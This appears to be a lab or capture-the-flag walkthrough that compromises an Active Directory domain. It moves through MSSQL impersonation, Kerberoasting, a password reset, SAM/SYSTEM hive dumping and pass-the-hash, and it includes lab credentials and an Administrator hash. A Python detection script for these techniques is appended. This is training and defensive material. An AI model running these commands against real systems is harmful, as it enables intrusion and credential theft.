# 1433

Now trying MSSQL with the `discovery` creds from [[445]]:

```
nxc mssql hokkaido-aerospace.com -u discovery -p 'Start123!'
```

![](/files/HL5gpLJd9KXLn0Lg6yUb)

Now we can log in to MSSQL with Windows auth:

```
mssqlclient.py discovery@hokkaido-aerospace.com -windows-auth
```

There is a database called `hrappdb` that we can't access:

![](/files/1NDZT2DEIb8il8cCVv2p)

Now checking which logins hold the server-level `IMPERSONATE` permission:

```
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
```

![](/files/WBGgpowqBv4oca0jD2UG)

Switch to that login and confirm who we are and whether it is a sysadmin:

```
EXECUTE AS LOGIN = 'hrappdb-reader';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
```

Now we are `hrappdb-reader`:

![](/files/3sgmijgZ86VFyV1leJdd)

Now checking databases:

```
SELECT name FROM master.dbo.sysdatabases
```

![](/files/bVHeCCUgHDqiZVo0iNp2)

Checking all tables in `hrappdb`:

```
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
```

![](/files/84XqVNSxIsPTtr3vx368)

Dumping the `sysauth` table:

```
SELECT * FROM sysauth;
```

![](/files/Wzam6dZ3ooSPZ14RShy6)

Now verifying the credentials found in `sysauth`:

![](/files/6OUTyWOv7WN5zZObMMWj)

They are valid.

Now running the BloodHound ingestor (bloodhound.py) as `hrapp-service`:

```
bloodhound.py -u 'hrapp-service' -p 'Untimed$Runny' -ns 192.168.218.40 -d hokkaido-aerospace.com -c all --zip
```

Now in BloodHound, checking outbound transitive object control for `hrapp-service`:

![](/files/homdPnwLOlW8j4Uui55z)

We have GenericWrite over `hazel`. Now to get hashes with targetedKerberoast:

```
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
```

![](/files/SxPDtKS5kHFJZQQuNHc0)

We got hashes for `maintenence`, `hazel` and `discover`.

Cracking them, we only got creds for `hazel`:

![](/files/XkgWbb09OTOqAS4oWQqz) ![](/files/ERhIfr1L8OVTjNJcGSS8)

Rerun BloodHound as Hazel:

```
bloodhound.py -u 'Hazel.Green' -p 'haze1988' -ns 192.168.218.40 -d hokkaido-aerospace.com -c all --zip
```

Now in BloodHound we check Hazel's outbound transitive object control:

![](/files/GKr5mSPjOF19HyM7GeR7)

We can see that Hazel is a member of TIER2-ADMINS and IT.

Checking the members of IT:

![](/files/8wOEMQUs8QiI00Y7WdcN)

There are 3 members:

Molly.Smith: ![](/files/7wYEVTBJWpKwtiWHYU9N)

Alexandra.Little: ![](/files/ciq2IMAfFVAelLQK9JqF)

We can see Molly has more rights.

Now checking the shortest path to Domain Admin:

![](/files/dbmHJdf7NRSTdrgoKlc0)

Now resetting Molly's password with Hazel's creds:

```
net rpc password "molly.smith" "Password123@" -U "hokkaido-aerospace.com"/"Hazel.Green"%"haze1988" -S "dc.hokkaido-aerospace.com"
```

Now we can use RDP:

![](/files/6iq3IXxQneH1vjXnvDk3)

```
xfreerdp /u:molly.smith /p:'Password123@' /v:hokkaido-aerospace.com /cert-ignore /compression /auto-reconnect
```

Connect using xfreerdp:

![](/files/rFwB8WT4lUEmfJLGy5gw)

We are `molly.smith` now.

Now running a command prompt as administrator with Molly's creds:

![](/files/Q4E63nOZUwjilnzk2bdl)

Now we can use our SeBackupPrivilege to privesc by saving the SAM and SYSTEM hives:

```
cd c:\
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
```

Now we have `sam` and `system` in the Temp directory.

Now start a Python upload server on Kali:

```
python3 -m uploadserver 80
```

Now upload `sam` and `system` by visiting the upload server in Edge on the Windows target.

Now use secretsdump.py on the two hive files:

```
secretsdump.py LOCAL -sam sam -system system
```

Now we have the hash for Administrator:

![](/files/2A2O5g8uxHcd29iHNLuc)

Now we have pwned it:

![](/files/wOVyp0TcvtbcH4I2ELAh)

Now we can log in with evil-winrm using the Administrator NT hash:

```
evil-winrm -i hokkaido-aerospace.com -u Administrator -H 'd752482897d54e239376fddb2a2109e4'
```

![](/files/m71q6FV5hMUFJymA4DbE)
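The three techniques chained above (the `EXECUTE AS LOGIN` hop in MSSQL, the targetedKerberoast burst of RC4 service tickets, and the `reg save` of the SAM/SYSTEM hives under SeBackupPrivilege) each leave a distinct trace. The following is an added detection example, not part of the original notes: it runs simple rules over constructed sample events (SQL Server audit rows, Windows 4688 process-creation and 4769 ticket-request events); the event field names and sample values are assumptions for this example, not a vendor schema.

```python
import re

# Constructed sample events modelled on this walkthrough (not real logs from
# the target); field names are assumed for the example, not a vendor schema.
SAMPLE_EVENTS = [
    {"src": "mssql_audit", "login": "discovery",
     "stmt": "SELECT name FROM master.dbo.sysdatabases"},
    {"src": "mssql_audit", "login": "discovery",
     "stmt": "EXECUTE AS LOGIN = 'hrappdb-reader'"},
    {"src": "win_4688", "user": "molly.smith", "cmd": r"reg  save hklm\sam c:\Temp\sam"},
    {"src": "win_4688", "user": "molly.smith", "cmd": r"reg save HKLM\SYSTEM c:\Temp\system"},
    {"src": "win_4688", "user": "jdoe", "cmd": r"reg query hklm\software\microsoft"},
    {"src": "win_4769", "user": "hrapp-service", "svc": "hazel.green", "etype": "0x17"},
    {"src": "win_4769", "user": "hrapp-service", "svc": "maintenence", "etype": "0x17"},
    {"src": "win_4769", "user": "hrapp-service", "svc": "discovery", "etype": "0x17"},
    {"src": "win_4769", "user": "jdoe", "svc": "cifs/dc", "etype": "0x12"},
]

# EXECUTE AS LOGIN switches the session to another server login (the hop from
# discovery to hrappdb-reader); audit it wherever IMPERSONATE is granted.
IMPERSONATE_RE = re.compile(r"\bEXECUTE\s+AS\s+LOGIN\b", re.IGNORECASE)
# reg save of the SAM/SYSTEM/SECURITY hives is the SeBackupPrivilege dump step.
HIVE_SAVE_RE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.IGNORECASE)
RC4_ETYPE = "0x17"          # TGS tickets encrypted with RC4, the crackable kind
KERBEROAST_THRESHOLD = 3    # distinct RC4 service tickets from one requester


def detect(events):
    """Return (rule, principal, detail) findings for the three techniques."""
    findings = []
    rc4_services = {}  # requesting account -> set of services ticketed with RC4
    for ev in events:
        if ev["src"] == "mssql_audit" and IMPERSONATE_RE.search(ev["stmt"]):
            findings.append(("mssql_impersonation", ev["login"], ev["stmt"]))
        elif ev["src"] == "win_4688":
            m = HIVE_SAVE_RE.search(ev["cmd"])
            if m:
                findings.append(("registry_hive_export", ev["user"], m.group(1).lower()))
        elif ev["src"] == "win_4769" and ev["etype"] == RC4_ETYPE:
            rc4_services.setdefault(ev["user"], set()).add(ev["svc"])
    # A burst of RC4 tickets for several accounts from one requester is the
    # targetedKerberoast footprint (one 4769 per SPN it sets and requests).
    for user, svcs in rc4_services.items():
        if len(svcs) >= KERBEROAST_THRESHOLD:
            findings.append(("kerberoast_burst", user, ",".join(sorted(svcs))))
    return findings


if __name__ == "__main__":
    for rule, who, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:22} {who:14} {detail}")
```

Against the constructed events, `detect` reports one impersonation, two hive exports by `molly.smith`, and one Kerberoast burst by `hrapp-service`; the plain `reg query` and the AES (0x12) ticket request are left alone.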

